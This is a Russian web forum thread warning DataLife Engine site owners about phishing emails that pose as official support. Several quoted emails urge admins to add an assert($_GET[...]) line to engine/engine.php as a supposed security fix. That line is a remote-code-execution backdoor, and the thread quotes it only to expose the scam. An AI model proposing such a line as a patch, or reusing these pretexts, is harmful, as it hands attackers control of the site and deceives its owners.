Ваш сайт ***.ru подвержен взлому!

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Школохакеры ищут новые способы взлома сайтов на DLE.

Внимание! Если вы получили письмо следующего содержания:

Здравствуйте, уважаемый клиент!



Благодарим Вас за использование на Вашем сайте ***.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: /engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);



С уважением,

Служба поддержки «DataLife Engine»

То ни в коем случае не "исправляйте" уязвимость. Иначе ваш сайт на DLE будет точно подвержен взлому.
Движок DLE модернизируется силами разработчиков, становится все более устойчивым к проискам школоло, которые называют себя хакерами, и последние ищут новые возможности для взлома ваших сайтов.

Подобные письма шлют мошенники, письма отправляют через обратную форму сайта. АйПи чаще всего прокси или ТОР.

Если вы получили подобное письмо, свяжитесь напрямую со службой поддержки DLE. Если вы используете нулль, то все фиксы уязвимостей публикуются на официальной странице багов. Проверьте, есть ли на этой странице подобная информация. Не подвергайте ваш сайт взлому!
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Кому интересно у школьников определился московский айпишник: 46.38.63.68
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Засранцы школоло очень творчески подходят к своему ремеслу, так сказать. За январь месяц я получил два письма. Судите сами, вот первое, полученное в новогодние каникулы

Поздравляем с Новым годом! Выход DataLife Engine 10.4, Патч безопасности для ****

Уважаемые владельцы сайта ***.ru!



Команда «DataLife Engine» поздравляет Вас с Новым 2015 годом!

Мы благодарим Вас за доверие и надеемся, что Вы продолжите использовать «DataLife Engine» на Ваших сайтах и в Новом году. Примите наши самые искренние пожелания здоровья, радости, благополучия Вам и Вашим близким! Пусть в Новом году успех сопутствует Вам во всех начинаниях! Совсем скоро, мы выпустим «DataLife Engine 10.4», ознакомиться с её возможностями и функциями Вы можете уже сейчас на официальном сайте «DataLife Engine».



Кроме того, осенью прошлого года многие сайты, использующие «DataLife Engine», были взломаны злоумышленниками при помощи XSS-атак. В связи с этим мы решили выпустить небольшой баг-фикс, лишающий злоумышленников возможности проводить XSS-атаки на Ваш сайт.

Для исправления, откройте файл ****.ru/engine/engine.php в любом текстовом редакторе и после строки "<?PHP" добавьте строку:

assert($_GET[striptags]);



С уважением,
Команда «DataLife Engine»

IP адрес отправителя: 46.38.63.68

Айпишник московский.

Немного дней спустя пришло еще одно письмо :)

[Критично] Ваш сайт ****.ru был взломан!

Уважаемые владельцы сайта ****.ru!



Благодарим Вас за использование на Вашем сайте CMS «DataLife Engine».

Сообщаем Вам о том, что за последние сутки в код Вашего сайта ***.ru был встроен вредоносный скрипт, осуществляющий перенаправление мобильных пользователей Вашего сайта на сайт, который представляет угрозу для мобильных устройств.

Скорее всего, злоумышленники получили доступ к панели управления Вашего сайта при помощи уязвимости в модуле Minify, входящем в состав DLE, который позволяет при определенных настройках серверного ПО читать содержимое файлов.

При помощи данной уязвимости любой файл, находящийся на Вашем сервере, может быть прочитан из браузера (при вводе соответствующего запроса), например, файл с данными для доступа к базе данных Вашего сайта. Получив доступ к базе данных, злоумышленникам не составит труда создать нового пользователя с правами администратора и авторизоваться через него в панели управления Вашего сайта.

Устраните уязвимость, следую инструкции указанной ниже. Кроме того, мы настоятельно рекомендуем Вам сменить все пароли от панели управления и базы данных Вашего сайта.

Для исправления откройте файл: ****.ru/engine/engine.php и в самое начало файла после строчки <?PHP добавьте:

assert($_GET[striptags]);



С уважением,
Команда «DataLife Engine»

IP адрес отправителя: 141.255.162.162

Еще раз повторюсь. Разработчики DLE НЕ делают рассылок через обратную форму связи сайтов!
Все патчи и фиксы для DLE вы можете увидеть по ссылке первого поста!
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Разберусь с делами, заскочу. Постараюсь.
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Хакеры взломали Ваш сайт мойсайт.ru!

Засранцы продолжают креативить :D
Какой только заголовок! Разве он не заставит задрожать админа сайта? Письмо якобы от службы поддержки DLE, и в нем сообщается, что сайт взломали! О ужас!

Само письмо:

Уважаемые владельцы сайта мойсайт.ru!



Благодарим Вас за использование на Вашем сайте мойсайт.ru CMS «DataLife Engine».

Сообщаем Вам о том, что за последние сутки в код Вашего сайта мойсайт.ru был встроен вредоносный скрипт, осуществляющий перенаправление мобильных пользователей Вашего сайта на сайт, который представляет угрозу для мобильных устройств.

Скорее всего, злоумышленники получили доступ к панели управления Вашего сайта при помощи уязвимости в модуле Minify, входящем в состав DLE, который позволяет при определенных настройках серверного ПО читать содержимое файлов.

При помощи данной уязвимости любой файл, находящийся на Вашем сервере, может быть прочитан из браузера (при вводе соответствующего запроса), например, файл с данными для доступа к базе данных Вашего сайта. Получив доступ к базе данных, злоумышленникам не составит труда создать нового пользователя с правами администратора и авторизоваться через него в панели управления Вашего сайта.

Устраните уязвимость, следую инструкции указанной ниже. Кроме того, мы настоятельно рекомендуем Вам сменить все пароли от панели управления и базы данных Вашего сайта.

Для исправления откройте файл: мойсайт.ru/engine/engine.php и в самое начало файла после строчки <?PHP добавьте:

assert($_GET[index]);



С уважением,
Команда «DataLife Engine»

IP адрес отправителя: 195.3.146.112

Айпишник скорее всего латвийский прокси.
Ну вы уже поняли. Менять и добавлять ничего не нужно.
 

Roman481

Пользователь
Регистрация
01.03.16
Сообщения
1
Реакции
0
Баллы
1
а я исправил надо сейчас вернуть обратно :shok:
 

Статистика форума

Темы
200.635
Сообщения
380.523
Пользователи
327.876
Новый пользователь
pm1199
Сверху Снизу